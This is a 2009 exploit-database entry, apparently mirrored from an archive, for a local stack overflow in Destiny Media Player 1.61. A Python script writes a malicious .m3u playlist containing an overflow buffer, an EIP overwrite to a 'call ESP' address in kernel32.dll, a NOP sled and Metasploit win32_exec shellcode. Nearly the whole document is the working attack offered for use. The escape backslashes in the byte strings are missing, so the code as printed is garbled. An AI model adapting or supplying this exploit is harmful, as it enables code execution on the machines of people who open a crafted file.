[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Destiny Media Player 1.61 (.m3u File) Local Stack Overflow Exploit
# Published : 2009-01-03
# Author : His0k4
# Previous Title : Destiny Media Player 1.61 (lst File) Local Buffer Overflow Exploit #5
# Next Title : PHP <= 5.2.8 gd library - imageRotate() Information Leak Vulnerability
#usage: exploit.py
#After creating the m3u file, start the program then File > Open Playlist > exploit.m3u
print "**************************************************************************"
print " Destiny Media Player 1.61 (.m3u File) Local Stack Overflow Exploitn"
print " Founder: aBo MoHaMeD"
print " exploit & code: His0k4"
print " Tested on: Windows XP Pro SP2 Frn"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)n"
print "**************************************************************************"
buff = "x41" * 2052
EIP = "x5Dx38x82x7C" #call ESP from kernel32.dll
nop = "x90" * 10 #Blah Blah :D
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"x29xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xc9"
"x2cxc9x40x83xebxfcxe2xf4x35xc4x8dx40xc9x2cx42x05"
"xf5xa7xb5x45xb1x2dx26xcbx86x34x42x1fxe9x2dx22x09"
"x42x18x42x41x27x1dx09xd9x65xa8x09x34xcexedx03x4d"
"xc8xeex22xb4xf2x78xedx44xbcxc9x42x1fxedx2dx22x26"
"x42x20x82xcbx96x30xc8xabx42x30x42x41x22xa5x95x64"
"xcdxefxf8x80xadxa7x89x70x4cxecxb1x4cx42x6cxc5xcb"
"xb9x30x64xcbxa1x24x22x49x42xacx79x40xc9x2cx42x28"
"xf5x73xf8xb6xa9x7ax40xb8x4axecxb2x10xa1xdcx43x44"
"x96x44x51xbex43x22x9exbfx2ex4fxa8x2cxaax02xacx38"
"xacx2cxc9x40"
)
exploit = buff + EIP + nop + shellcode # too easy :p
try:
out_file = open("exploit.m3u",'w')
out_file.write(exploit)
out_file.close()
raw_input("nExploit file created!n")
except:
print "Error"
# www.Syue.com [2009-01-03]